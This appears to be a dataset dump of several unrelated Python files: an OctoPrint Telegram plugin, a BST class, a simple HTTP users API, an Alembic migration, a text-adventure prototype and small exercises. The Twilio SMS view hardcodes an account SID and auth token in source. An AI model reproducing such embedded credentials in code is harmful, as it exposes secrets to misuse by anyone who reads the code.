data['token']!=old_token:\n\t\t\tself.stop_listening()\n\t\tif data['token']!=\"\":\n\t\t\tself.start_listening()\n\t\telse:\n\t\t\tself.connection_state_str = gettext(\"No token given.\")\n\t\n\tdef get_settings_defaults(self):\n\t\treturn dict(\n\t\t\ttoken = \"\",\n\t\t\tnotification_height = 5.0,\n\t\t\tnotification_time = 15,\n\t\t\tmessage_at_startup = True,\n\t\t\tmessage_at_shutdown = True,\n\t\t\tmessage_at_print_started = True,\n\t\t\tmessage_at_print_done = True,\n\t\t\tmessage_at_print_done_delay = 0,\n\t\t\tmessage_at_print_failed = True,\n\t\t\tmessages = dict(\n\t\t\t\tPrintStarted = gettext(\"Started printing {file}.\"),\n\t\t\t\tPrintFailed = gettext(\"Printing {file} failed.\"),\n\t\t\t\tZChange = gettext(\"Printing at Z={z}.\\nBed {bed_temp}/{bed_target}, Extruder {e1_temp}/{e1_target}.\\n{time_done}, {percent}%% done, {time_left} remaining.\"),\n\t\t\t\tPrintDone = gettext(\"Finished printing {file}.\"),\n\t\t\t\tTelegramSendNotPrintingStatus = gettext(\"Not printing.\\nBed {bed_temp}/{bed_target}, Extruder {e1_temp}/{e1_target}.\")\n\t\t\t),\n\t\t\ttracking_activated = False,\n\t\t\ttracking_token = None,\n\t\t\tchats = dict(), \n\t\t\tdebug = False\n\t\t)\n\t\n\tdef get_template_configs(self):\n\t\treturn [\n\t\t\tdict(type=\"settings\", name=\"Telegram\", custom_bindings=True)\n\t\t]\n\t\n\tdef get_update_information(self, *args, **kwargs):\n\t\treturn dict(\n\t\t\ttelegram=dict(\n\t\t\t\tdisplayName=self._plugin_name,\n\t\t\t\tdisplayVersion=self._plugin_version,\n\t\t\t\t\n\t\t\t\ttype=\"github_release\",\n\t\t\t\tcurrent=self._plugin_version,\n\t\t\t\tuser=\"fabianonline\",\n\t\t\t\trepo=\"OctoPrint-Telegram\",\n\t\t\t\t\n\t\t\t\tpip=\"https://github.com/fabianonline/OctoPrint-Telegram/archive/{target}.zip\"\n\t\t\t)\n\t\t)\n\t\n\tdef is_notification_necessary(self, new_z, old_z):\n\t\ttimediff = self._settings.get_int(['notification_time'])\n\t\tif timediff and timediff > 0:\n\t\t\t# check the timediff\n\t\t\tif self.last_notification_time + timediff*60 <= time.time():\n\t\t\t\treturn True\n\t\tzdiff = self._settings.get_float(['notification_height'])\n\t\tif zdiff and zdiff > 0.0:\n\t\t\tif old_z is None:\n\t\t\t\treturn False\n\t\t\t# check the zdiff\n\t\t\tif abs(new_z - (old_z or 0.0)) >= 2.0:\n\t\t\t\t# big changes in height are not interesting for notifications - we ignore them\n\t\t\t\tself.last_z = new_z\n\t\t\t\treturn False\n\t\t\tif new_z >= self.last_z + zdiff or new_z < self.last_z:\n\t\t\t\treturn True\n\t\treturn False\n\t\t\n\tdef on_event(self, event, payload, *args, **kwargs):\n\t\ttry:\n\t\t\tif event != \"PrintDone\" and event != \"PrintStarted\" and event != \"ZChange\" and event!=\"PrintFailed\" and event!=\"TelegramSendPrintingStatus\" and event!=\"TelegramSendNotPrintingStatus\":\n\t\t\t\t# return as fast as possible\n\t\t\t\treturn\n\t\t\t\n\t\t\tself._logger.debug(\"Got an event: \" + event + \" Payload: \" + str(payload))\n\t\t\t# PrintFailed Payload: {'origin': 'local', 'file': u'cube.gcode'}\n\t\t\t# MovieDone Payload: {'gcode': u'cube.gcode', 'movie_basename': 'cube_20160216125143.mpg', 'movie': '/home/pi/.octoprint/timelapse/cube_20160216125143.mpg'}\n\t\t\t\n\t\t\tz = \"\"\n\t\t\tfile = \"\"\n\t\t\n\t\t\tstatus = self._printer.get_current_data()\n\t\t\tdelay = 0\n\t\t\ttrack = True\n\t\t\tif event==\"ZChange\":\n\t\t\t\tif not status['state']['flags']['printing']:\n\t\t\t\t\treturn\n\t\t\t\tz = payload['new']\n\t\t\t\tself._logger.debug(\"Z-Change. new_z=%.2f old_z=%.2f last_z=%.2f notification_height=%.2f notification_time=%d\",\n\t\t\t\t\tz,\n\t\t\t\t\tpayload['old'],\n\t\t\t\t\tself.last_z,\n\t\t\t\t\tself._settings.get_float(['notification_height']),\n\t\t\t\t\tself._settings.get_int(['notification_time']))\n\t\t\t\t\n\t\t\t\tif not self.is_notification_necessary(payload['new'], payload['old']):\n\t\t\t\t\treturn\n\t\t\telif event==\"PrintStarted\":\n\t\t\t\tself.last_z = 0.0\n\t\t\t\tself.last_notification_time = time.time()\n\t\t\t\tif not self._settings.get_boolean([\"message_at_print_started\"]):\n\t\t\t\t\treturn\n\t\t\telif event==\"PrintDone\":\n\t\t\t\tif self.shut_up:\n\t\t\t\t\tself.shut_up = False\n\t\t\t\t\treturn\n\t\t\t\tif not self._settings.get_boolean([\"message_at_print_done\"]):\n\t\t\t\t\treturn\n\t\t\t\tdelay = self._settings.get_int([\"message_at_print_done_delay\"])\n\t\t\telif event==\"PrintFailed\":\n\t\t\t\tif self.shut_up:\n\t\t\t\t\tself.shut_up = False\n\t\t\t\t\treturn\n\t\t\t\tif not self._settings.get_boolean([\"message_at_print_failed\"]):\n\t\t\t\t\treturn\n\t\t\telif event==\"TelegramSendPrintingStatus\":\n\t\t\t\tz = payload['z']\n\t\t\t\t# Change the event type in order to generate a ZChange message\n\t\t\t\tevent = \"ZChange\"\n\t\t\t\ttrack = False\n\t\t\telif event==\"TelegramSendNotPrintingStatus\":\n\t\t\t\ttrack = False\n\t\t\t\n\t\t\tself.last_notification_time = time.time()\n\t\t\tself.last_z = z\n\t\t\t\t\n\t\t\tif self.shut_up:\n\t\t\t\treturn\n\t\t\t\n\t\t\tself._logger.debug(str(status))\n\t\t\ttemps = self._printer.get_current_temperatures()\n\t\t\tself._logger.debug(str(temps))\n\t\t\tbed_temp = temps['bed']['actual'] if 'bed' in temps else 0.0\n\t\t\tbed_target = temps['bed']['target'] if 'bed' in temps else 0.0 \n\t\t\te1_temp = temps['tool0']['actual']\n\t\t\te1_target = temps['tool0']['target']\n\t\t\te2_temp = e2_target = None\n\t\t\tif \"tool1\" in temps:\n\t\t\t\te2_temp = temps['tool1']['actual']\n\t\t\t\te2_target = temps['tool1']['target']\n\t\t\tpercent = int(status['progress']['completion'] or 0)\n\t\t\ttime_done = octoprint.util.get_formatted_timedelta(datetime.timedelta(seconds=(status['progress']['printTime'] or 0)))\n\t\t\ttime_left = octoprint.util.get_formatted_timedelta(datetime.timedelta(seconds=(status['progress']['printTimeLeft'] or 0)))\n\t\t\t\n\t\t\tif \"file\" in payload: file = payload[\"file\"]\n\t\t\tif \"gcode\" in payload: file = payload[\"gcode\"]\n\t\t\tif \"filename\" in payload: file = payload[\"filename\"]\n\t\t\tmessage = self._settings.get([\"messages\", event]).format(**locals())\n\t\t\tself._logger.debug(\"Sending message: \" + message)\n\t\t\tif \"chatID\" in kwargs:\n\t\t\t\tself.send_msg(message, with_image=True, delay=delay,chatID=kwargs['chatID'])\n\t\t\telse:\n\t\t\t\tself.send_msg(message, with_image=True, delay=delay)\n\t\t\tif track:\n\t\t\t\tself.track_action(\"notification/\" + event)\n\t\texcept Exception as e:\n\t\t\tself._logger.debug(\"Exception: \" + str(e))\n\t\n\tdef send_msg(self, message, **kwargs):\n\t\tkwargs['message'] = message\n\t\tthreading.Thread(target=self._send_msg, kwargs=kwargs).run()\n\n\tdef _send_msg(self, message=\"\", with_image=False, responses=None, force_reply=False, delay=0, chatID = \"\"):\n\t\tif delay > 0:\n\t\t\ttime.sleep(delay)\n\t\ttry:\n\t\t\tself._logger.debug(\"Sending a message: \" + message.replace(\"\\n\", \"\\\\n\") + \" with_image=\" + str(with_image) + \" chatID= \" + str(chatID))\n\t\t\tdata = {}\n\t\t\t# We always send hide_keyboard unless we send an actual keyboard\n\t\t\tdata['reply_markup'] = json.dumps({'hide_keyboard': True}) \n\n\t\t\tif force_reply:\n\t\t\t\tdata['reply_markup'] = json.dumps({'force_reply': True})\n\t\t\tif responses:\n\t\t\t\tkeyboard = {'keyboard':map(lambda x: [x], responses), 'one_time_keyboard': True}\n\t\t\t\tdata['reply_markup'] = json.dumps(keyboard)\n\t\t\timage_data = None\n\t\t\tif with_image:\n\t\t\t\timage_data = self.take_image()\n\t\t\tself._logger.debug(\"data so far: \" + str(data))\n\t\t\tif image_data:\n\t\t\t\tself._logger.debug(\"Sending with image.\")\n\t\t\t\tfiles = {'photo':(\"image.jpg\", image_data)}\n\t\t\t\tdata['caption'] = message\n\t\t\t\tif chatID == \"\":\n\t\t\t\t\tchats = self._settings.get(['chats'])\n\t\t\t\t\tfor key in chats:\n\t\t\t\t\t\tif chats[key]['send_notifications'] is True:\n\t\t\t\t\t\t\tdata['chat_id'] = key\n\t\t\t\t\t\t\tself._logger.debug(\"Sending... \" + str(key))\n\t\t\t\t\t\t\tr = requests.post(self.bot_url + \"/sendPhoto\", files=files, data=data)\n\t\t\t\t\t\t\tself._logger.debug(\"Sending finished. \" + str(r.status_code) + \" \" + str(r.content))\n\t\t\t\telse:\n\t\t\t\t\tdata['chat_id'] = chatID\n\t\t\t\t\tr = requests.post(self.bot_url + \"/sendPhoto\", files=files, data=data)\n\t\t\t\t\tself._logger.debug(\"Sending finished. \" + str(r.status_code) + \" \" + str(r.content))\n\n\t\t\telse:\n\t\t\t\tself._logger.debug(\"Sending without image.\")\n\t\t\t\tdata['text'] = message\n\t\t\t\tif chatID == \"\":\n\t\t\t\t\tchats = self._settings.get(['chats'])\n\t\t\t\t\tfor key in chats:\n\t\t\t\t\t\tif chats[key]['send_notifications'] is True:\n\t\t\t\t\t\t\tdata['chat_id'] = key\n\t\t\t\t\t\t\tself._logger.debug(\"Sending... \" + str(key))\n\t\t\t\t\t\t\trequests.post(self.bot_url + \"/sendMessage\", data=data)\n\t\t\t\telse:\n\t\t\t\t\tdata['chat_id'] = chatID\n\t\t\t\t\trequests.post(self.bot_url + \"/sendMessage\", data=data)\n\t\texcept Exception as ex:\n\t\t\tself._logger.debug(\"Caught an exception in send_msg(): \" + str(ex))\n\t\n\tdef send_video(self, message, video_file):\n\t\tfiles = {'video': open(video_file, 'rb')}\n\t\t#r = requests.post(self.bot_url + \"/sendVideo\", files=files, data={'chat_id':self._settings.get([\"chat\"]), 'caption':message}) #############################HIER\n\t\tself._logger.debug(\"Sending finished. \" + str(r.status_code) + \" \" + str(r.content))\n\t\n\tdef get_file(self, file_id):\n\t\tself._logger.debug(\"Requesting file with id %s.\", file_id)\n\t\tr = requests.get(self.bot_url + \"/getFile\", data={'file_id': file_id})\n\t\t# {\"ok\":true,\"result\":{\"file_id\":\"BQADAgADCgADrWJxCW_eFdzxDPpQAg\",\"file_size\":26,\"file_path\":\"document\\/file_3.gcode\"}}\n\t\tr.raise_for_status()\n\t\tdata = r.json()\n\t\tif not \"ok\" in data:\n\t\t\traise Exception(_(\"Telegram didn't respond well to getFile. The response was: %(response)s\", response=r.text))\n\t\turl = self.bot_file_url + \"/\" + data['result']['file_path']\n\t\tself._logger.debug(\"Downloading file: %s\", url)\n\t\tr = requests.get(url)\n\t\tr.raise_for_status()\n\t\treturn r.content\n\n\tdef take_image(self):\n\t\tsnapshot_url = self._settings.global_get([\"webcam\", \"snapshot\"])\n\t\tself._logger.debug(\"Snapshot URL: \" + str(snapshot_url))\n\t\tdata = None\n\t\tif snapshot_url:\n\t\t\ttry:\n\t\t\t\tr = requests.get(snapshot_url)\n\t\t\t\tdata = r.content\n\t\t\texcept Exception as e:\n\t\t\t\treturn None\n\t\tflipH = self._settings.global_get([\"webcam\", \"flipH\"])\n\t\tflipV = self._settings.global_get([\"webcam\", \"flipV\"])\n\t\trotate= self._settings.global_get([\"webcam\", \"rotate90\"])\n\t\t\n\t\tif flipH or flipV or rotate:\n\t\t\timage = Image.open(StringIO.StringIO(data))\n\t\t\tif rotate:\n\t\t\t\timage = image.transpose(Image.ROTATE_90)\n\t\t\tif flipH:\n\t\t\t\timage = image.transpose(Image.FLIP_LEFT_RIGHT)\n\t\t\tif flipV:\n\t\t\t\timage = image.transpose(Image.FLIP_TOP_BOTTOM)\n\t\t\toutput = StringIO.StringIO()\n\t\t\timage.save(output, format=\"JPEG\")\n\t\t\tdata = output.getvalue()\n\t\t\toutput.close()\n\t\treturn data\n\t\n\tdef test_token(self, token=None):\n\t\tif token is None:\n\t\t\ttoken = self._settings.get([\"token\"])\n\t\tresponse = requests.get(\"https://api.telegram.org/bot\" + token + \"/getMe\")\n\t\tself._logger.debug(\"getMe returned: \" + str(response.json()))\n\t\tself._logger.debug(\"getMe status code: \" + str(response.status_code))\n\t\tjson = response.json()\n\t\tif not 'ok' in json or not json['ok']:\n\t\t\tif json['description']:\n\t\t\t\traise(Exception(gettext(\"Telegram returned error code %(error)s: %(message)s\", error=json['error_code'], message=json['description'])))\n\t\t\telse:\n\t\t\t\traise(Exception(gettext(\"Telegram returned an unspecified error.\")))\n\t\telse:\n\t\t\treturn \"@\" + json['result']['username']\n\t\t\t\t\n\tdef get_api_commands(self):\n\t\treturn dict(\n\t\t\ttestToken=[\"token\"],\n\t\t\tupdateChat=[\"ID\"],\n\t\t\tdelChat=[\"ID\"]\n\t\t)\n\t\n\tdef on_api_get(self, request):\n\t\treturn json.dumps({'chats':self.chats, 'connection_state_str':self.connection_state_str, 'connection_ok':self.connection_ok})\n\t\n\tdef on_api_command(self, command, data):\n\t\tif command==\"testToken\":\n\t\t\tself._logger.debug(\"Testing token {}\".format(data['token']))\n\t\t\ttry:\n\t\t\t\tusername = self.test_token(data['token'])\n\t\t\t\treturn json.dumps({'ok': True, 'connection_state_str': gettext(\"Token valid for %(username)s.\", username=username), 'error_msg': None, 'username': username})\n\t\t\texcept Exception as ex:\n\t\t\t\treturn json.dumps({'ok': False, 'connection_state_str': gettext(\"Error: %(error)s\", error=ex), 'username': None, 'error_msg': str(ex)})\n\t\telif command==\"updateChat\":\n\t\t\tstrId = str(data['ID'])\n\t\t\tif strId in self.chats:\t\t\t\t\t\t\t\t\n\t\t\t\tself.chats[strId]['send_notifications'] = data['chatNotify']\n\t\t\t\tself.chats[strId]['accept_commands'] = data['chatCmd']\t\n\t\t\treturn json.dumps({'chats':self.chats, 'connection_state_str':self.connection_state_str, 'connection_ok':self.connection_ok})\n\t\telif command==\"delChat\":\n\t\t\tstrId = str(data['ID'])\n\t\t\tself._logger.debug(\"Deleting Chat ID {}\".format(data['ID']))\n\t\t\tif strId in self.chats:\t\n\t\t\t\tdel self.chats[strId]\n\t\t\t\tself._logger.debug(\"Done Deleting ID {}\".format(data['ID']))\n\t\t\treturn json.dumps({'chats':self.chats, 'connection_state_str':self.connection_state_str, 'connection_ok':self.connection_ok})\n\n\n\t\n\tdef get_assets(self):\n\t\treturn dict(js=[\"js/telegram.js\"])\n\t\t\n\tdef track_action(self, action):\n\t\tif not self._settings.get_boolean([\"tracking_activated\"]):\n\t\t\treturn\n\t\tif self._settings.get([\"tracking_token\"]) is None:\n\t\t\ttoken = \"\".join(random.choice(\"abcdef0123456789\") for i in xrange(16))\n\t\t\tself._settings.set([\"tracking_token\"], token)\n\t\tparams = {'idsite': '3', 'rec': '1', 'url': 'http://octoprint-telegram/'+action, 'action_name': (\"%20/%20\".join(action.split(\"/\"))), '_id': self._settings.get([\"tracking_token\"])}\n\t\tthreading.Thread(target=requests.get, args=(\"http://piwik.schlenz.ruhr/piwik.php\",), kwargs={'params': params}).run()\n\n__plugin_name__ = \"Telegram Notifications\"\n__plugin_implementation__ = TelegramPlugin()\n__plugin_hooks__ = {\n\t\"octoprint.plugin.softwareupdate.check_config\": __plugin_implementation__.get_update_information\n}\n","sub_path":"octoprint_telegram/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":31724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"288812236","text":"from random import randrange\nfrom time import sleep\nn = int(input('Estou pensando em um numero entre 0 e 5! \\nTente adivinhar qual é: '))\nn2 = randrange(5)\nprint('Processando...')\nsleep(2)\nif n == n2:\n print('Parabéns, você acertou')\nelse:\n print('Que pena, você errou! O numero era {}, tente novamente'.format(n2))\n","sub_path":"ex028.py","file_name":"ex028.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"356427918","text":"import random\n\n\nclass TreeNode:\n def __init__(self, key, val):\n self.key = key\n self.val = val\n self.left = None\n self.right = None\n\n def __iter__(self):\n \"\"\" Return iterator that iterates through the elements in the BST\n below this node \"\"\"\n\n if self.left:\n for elt in self.left:\n yield elt\n\n yield (self.key, self.val)\n\n if self.right:\n for elt in self.right:\n yield elt\n\n def put(self, key, val):\n \"\"\" Add a new mapping between key and value in the tree \"\"\"\n if self.key == key:\n self.val = val\n elif self.key > key:\n if self.left:\n self.left.put(key, val)\n else:\n self.left = TreeNode(key, val)\n else:\n if self.right:\n self.right.put(key, val)\n else:\n self.right = TreeNode(key, val)\n\n def get(self, key):\n \"\"\" Get the value associated with the key \"\"\"\n if self.key == key:\n return self.val\n\n if self.key > key:\n if self.left:\n return self.left.get(key)\n else:\n return None\n else:\n if self.right:\n return self.right.get(key)\n else:\n return None\n\n def delete(self, key):\n \"\"\" Delete the node with the given key and return the\n root node of the tree \"\"\"\n\n if self.key == key:\n if self.right and self.left:\n [psucc, succ] = self.right._find_min(self)\n\n if psucc.left == succ:\n psucc.left = succ.right\n else:\n psucc.right = succ.right\n\n succ.left = self.left\n succ.right = self.right\n\n return succ\n\n else:\n if self.left:\n return self.left\n else:\n return self.right\n else:\n if self.key > key:\n if self.left:\n self.left = self.left.delete(key)\n\n else:\n if self.right:\n self.right = self.right.delete(key)\n\n return self\n\n def _find_min(self, parent):\n \"\"\" Return the minimum node in the current tree and its parent \"\"\"\n if self.left:\n return self.left._find_min(self)\n else:\n return [parent, self]\n\n\nclass BinarySearchTree:\n def __init__(self):\n \"\"\" Create an empty Binary Search Tree\"\"\"\n self.root = None\n\n def put(self, key, value):\n \"\"\" Add an object with a specific key to the BST \"\"\"\n if self.root:\n self.root.put(key, value)\n else:\n self.root = TreeNode(key, value)\n\n def get(self, key):\n \"\"\" Retrieve the object associated with the given key\"\"\"\n if self.root:\n return self.root.get(key)\n else:\n return None\n\n def has_key(self, key):\n \"\"\" Check whether BST has given key \"\"\"\n return not self.get(key) is None\n\n def delete(self, key):\n \"\"\" Remove object with given key from BST \"\"\"\n if self.root:\n self.root = self.root.delete(key)\n\n def __iter__(self):\n \"\"\" Returns an iterator for the binary search tree \"\"\"\n\n class EmptyIterator:\n def next(self):\n raise StopIteration\n\n if self.root:\n return iter(self.root)\n else:\n return EmptyIterator()\n\n\nif __name__ == '__main__':\n priority_queue = BinarySearchTree()\n\n for i in random.sample(range(1000), 10):\n priority_queue.put(-i, \"Task with Priority \" + str(i))\n\n for task in priority_queue:\n print(task)\n","sub_path":"data_and_algorithms/binary_search_tree.py","file_name":"binary_search_tree.py","file_ext":"py","file_size_in_byte":3817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"640263154","text":"import os\nfrom twilio.rest import Client\nfrom django.http import HttpResponse\n\ndef run(request):\n account_sid = 'AC5bca5e1fe8572e4c10e0f66b6f63e9f8'\n auth_token = 'cb4fad176775963c18b8243709fa7625'\n\n client = Client (account_sid, auth_token)\n\n client.messages.create(\n to = '+14234830892',\n from_='+14232056663',\n body='Hi NAME. Will you be making it to your appointment on DATE? Respond Y/N.'\n )\n return HttpResponse('Sent text')\n","sub_path":"OCC_Twilio/texter/send_sms.py","file_name":"send_sms.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"423476819","text":"import re\nimport json\n\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\n\nPORT = 8080\nHOST = '127.0.0.1'\n\n\nusers = {\n '234342': {\n 'id': 234342,\n 'created': '2016-09-10 11:20:42.143590',\n 'first_name': 'Peter',\n 'last_name': 'Griffen'\n },\n '234298': {\n 'id': 234298,\n 'created': '2016-05-10 20:18:29.451250',\n 'first_name': 'Homer',\n 'last_name': 'Simpson'\n }\n}\n\n\nclass UsersApi(BaseHTTPRequestHandler):\n\n def _list_users(self):\n return json.dumps(list(users.values()))\n\n def _get_user(self, id):\n user = users.get(id)\n if user:\n return json.dumps(user)\n\n def _with_response_code(self, code):\n # Send response status code\n self.send_response(code)\n\n # Send headers\n self.send_header('Content-type', 'application/json')\n self.end_headers()\n\n def _write(self, data):\n self.wfile.write(bytes(data, \"utf8\"))\n\n def do_GET(self):\n if self.path == '/users':\n self._with_response_code(200)\n self._write(self._list_users())\n\n elif re.match('/users/[0-9]+$', self.path):\n id = self.path.split('/')[-1:][0] # Grab the last value\n user = self._get_user(id)\n if user:\n self._with_response_code(200)\n self._write(user)\n else:\n self._with_response_code(404)\n\n else:\n self._with_response_code(404)\n\n\nif __name__ == '__main__':\n server_address = (HOST, PORT)\n print('starting server on %s:%s...' % server_address)\n\n httpd = HTTPServer(server_address, UsersApi)\n httpd.serve_forever()\n","sub_path":"solution/server/step-3/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"520847816","text":"import numpy as np\nfrom PIL import Image\nfrom matplotlib import *\n\n\nclass TrainDataRetriever:\n\n labels = []\n\n def add_train_data(self, directory, label, img_type):\n for filename in os.listdir('./shapes/shapes/' + directory):\n current_image = Image.open('./shapes/shapes/' + directory + '/' + filename)\n current_image_as_array = np.array(current_image)\n rescaled_image_pixels = current_image_as_array / 255.0\n img_type.append(rescaled_image_pixels.tolist())\n self.labels.append(label)\n return np.array(img_type)\n","sub_path":"src/train_data_retriever.py","file_name":"train_data_retriever.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"435775689","text":"\"\"\"empty message\n\nRevision ID: e30e85a186a4\nRevises: 7449bc72f5ba\nCreate Date: 2016-08-24 19:27:20.689021\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'e30e85a186a4'\ndown_revision = '7449bc72f5ba'\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('author', 'is_author',\n existing_type=mysql.TINYINT(display_width=1),\n type_=sa.Boolean(),\n existing_nullable=True)\n op.alter_column('post', 'live',\n existing_type=mysql.TINYINT(display_width=1),\n type_=sa.Boolean(),\n existing_nullable=True)\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('post', 'live',\n existing_type=sa.Boolean(),\n type_=mysql.TINYINT(display_width=1),\n existing_nullable=True)\n op.alter_column('author', 'is_author',\n existing_type=sa.Boolean(),\n type_=mysql.TINYINT(display_width=1),\n existing_nullable=True)\n ### end Alembic commands ###\n","sub_path":"migrations/versions/e30e85a186a4_.py","file_name":"e30e85a186a4_.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"145922166","text":"from random import choice, random\n\n\nclass Spellbook:\n def __init__(self):\n # dmg, energy, turns\n self.avail_spells = {\"Shock\":(10,10,1),\"IceStorm\":(3,10,4),\"VolcanoBomb\":(50,60,1)}\n self.learned_spells = []\n spell = choice(list(self.avail_spells.keys()))\n self.learned_spells.append(spell)\n\n\ndef gen_jewelry(bonus):\n names1 = \"Gold\", \"Sapphire\", \"Silver\", \"Bronze\", \"Titanium\", \"Ruby\", \"Diamond\", \"Steel\"\n names2 = \"Ring\", \"Amulet\", \"Key\", \"Headband\"\n\n return choice(names1) + \" \" + choice(names2), 2 * bonus * (random() * 0.2 + 0.9)\n\n\nclass Adv_User:\n def __init__(self):\n self.name = \"Bob Saget\"\n\n self.health = 100\n self.energy = 15\n \n self.maxhealth = 100\n self.maxenergy = 15\n \n self.level = 1\n self.exp = 0\n self.exp_to_next = 0\n \n self.gold = 0\n self.inventory = []\n self.weapon = \"Dagger\", 5\n self.armor = \"Fur\", 1.4\n self.jewelry = gen_jewelry(1.2)\n\n self.spellbook = Spellbook()\n self.used_spell = None\n \n self.stats = {\"Strength\":10,\"Knowledge\":10}\n\n self.position = 22, 5\n\n self.can_do = \"Idling\", \"Fighting\", \"Socializing\", \"Examining\"\n self.doing = 0\n\n def level_up(self, point):\n self.stats[point] += 1\n self.exp = 0\n self.exp_to_next *= 2\n if point == \"Knowledge\":\n self.maxenergy += 5\n if point == \"Strength\":\n self.maxhealth += 10\n\n self.energy = self.maxenergy\n self.health = self.maxhealth\n \n\n\n def take_damage(self, source):\n dmg, kind = source\n if kind == \"magic\":\n res = self.jewelry[1]\n elif kind == \"physical\":\n res = self.armor[1]\n\n true = dmg - res \n return true\n\n def add_multis(self, source):\n dmg, kind = source\n if kind == \"magic\":\n multi = self.stats[\"Knowledge\"] * 0.5\n elif kind == \"Physical\":\n multi = self.stats[\"Strength\"] * 0.35\n\n true = dmg + multi\n return true\n\n def use_spell(self, name):\n if name not in self.spellbook.learned_spells.keys():\n return \"not learned\"\n spell = self.spellbook.learned_spells[name]\n self.used_spell = spell\n\n\nclass Map:\n def __init__(self):\n self.legend = {\n \"$\":\"General Store\",\n \"#\":\"Library\",\n \"U\":\"Tavern\",\n \"5\":\"Blacksmith\",\n \"X\":\"Town\",\n \"Y\":\"Woods\",\n \"D\":\"Cave\",\n \"=\":\"River\",\n \"O\":\"Lake\",\n \"Q\":\"Waterfall\",\n \"+\":\"Crossroads\",\n \"-\":\"Road\",\n \"&\":\"Swamp\",\n \".\":\"Grass\",\n \"/\":\"Bridge\",\n \"h\":\"House\",\n \"M\":\"Mountain\"\n }\n\n\n def out_of_bounds(self, p):\n m = self.game_map\n x, y = p\n mx, my = len(m[0]), len(m)\n if not 0 <= x < mx:\n return True\n if not 0 <= y < my:\n return True\n return False\n\n def load_map(self, name):\n with open(name, \"r\") as f:\n lines = f.readlines()\n\n self.game_map = []\n maxx, maxy = len(lines[0])-1, len(lines)\n for y in range(maxy):\n self.game_map.append([])\n for x in range(maxx):\n tile = lines[y][x]\n self.game_map[y].append(tile)\n\n\ndef get_general_report(char, mapobj):\n game_map = mapobj.game_map\n l = mapobj.legend\n x, y = char.position\n d = {\n \"health\":char.health,\n \"energy\":char.energy,\n \"at\":l[game_map[y][x]],\n \"doing\":char.can_do[char.doing]\n }\n try: d[\"top\"] = l[game_map[y-1][x]]\n except IndexError: d[\"top\"] = \"Unavailible.\"\n try: d[\"right\"] = l[game_map[y][x+1]]\n except IndexError: d[\"right\"] = \"Unavailible.\"\n try: d[\"bottom\"] = l[game_map[y+1][x]]\n except IndexError: d[\"bottom\"] = \"Unavailible.\"\n try: d[\"left\"] = l[game_map[y][x-1]]\n except IndexError: d[\"left\"] = \"Unavailible.\"\n text = \"You have {health} health and {energy} energy. \\\nIn order top, right, bottom, left are {top}, {right}, {bottom}, {left}. \\\nYou are at {at}. You're currently {doing}.\".format(health=d[\"health\"],energy=d[\"energy\"],\\\n at=d[\"at\"],doing=d[\"doing\"],top=d[\"top\"],\\\n bottom=d[\"bottom\"],right=d[\"right\"],left=d[\"left\"])\n return text\n\ndef copylist(l):\n n = []\n for i in l:\n if isinstance(i, list):\n n.append(copylist(i))\n else:\n n.append(i)\n return n\n\ndef dpaste_this(content):\n print(content)\n\ndef link_map(char, mapobj):\n x, y = char.position\n copied = copylist(mapobj.game_map)\n copied[y][x] = \"Z\"\n content = \"\\n\".join(\"\".join(y) for y in copied)\n link = dpaste_this(content)\n return \"You are Z. {0}\".format(link)\n\n\nclass Adventure:\n def __init__(self):\n self.users = {}\n\n self.game_map = Map()\n self.game_map.load_map(\"map01.advmap\")\n\n def action(self, user, c):\n if user in self.users.keys():\n char = self.users[user]\n\n if c.rest[0] == \"report\":\n if c.rest[1] == \"general\":\n return get_general_report(char, self.game_map)\n elif c.rest[1] == \"map\":\n return link_map(char, self.game_map)\n\n elif c.rest[0] == \"move\":\n if char.doing == 0:\n move_dict = {\"up\":(0,-1),\"down\":(0,1),\"left\":(-1,0),\"right\":(1,0)}\n dx, dy = move_dict[c.rest[1]]\n new_pos = char.position[0] + dx, char.position[1] + dy\n if not self.game_map.out_of_bounds(new_pos):\n char.position = new_pos\n return \"Moved \" + c.rest[1] + \".\"\n else:\n return \"Unable to move there.\"\n else:\n return \"You are busy.\"\n\n elif c.rest[0] == \"social\":\n pass\n \n else:\n if c.rest[0] == \"create\":\n new_adv_acc = Adv_User()\n new_adv_acc.name = c.rest[1]\n self.users[user] = new_adv_acc\n return \"Account with name {name} created!\".format(name=c.rest[1])\n\nclass SComm:\n rest = []\n\nadv = Adventure()\nwhile True:\n s = \" \".join(input(\">\").split(\" \")[1:])\n comms = SComm()\n comms.rest = s.split(\" \")\n try: print(adv.action(\"vegard1992\", comms))\n except Exception as e: print(e)\n\n\n# implement better equipment / inventory system?\n# implement trading\n# implement fighting\n# implement examining\n# finish off \"report\" command\n","sub_path":"testing_adv.py","file_name":"testing_adv.py","file_ext":"py","file_size_in_byte":6803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"404824448","text":"# vi: ts=4 sw=4 sts=4 expandtab\nfrom enum import IntEnum\nimport time as ttime\nimport ctypes\nimport threading\nimport queue\nimport logging\nimport warnings\nimport functools\nimport numpy as np\n\nimport epics\n\nfrom .errors import DisconnectedError, OpException\n\n__all__ = ['split_record_field',\n 'strip_field',\n 'record_field',\n 'MonitorDispatcher',\n 'get_pv_form',\n 'set_and_wait',\n 'AlarmStatus',\n 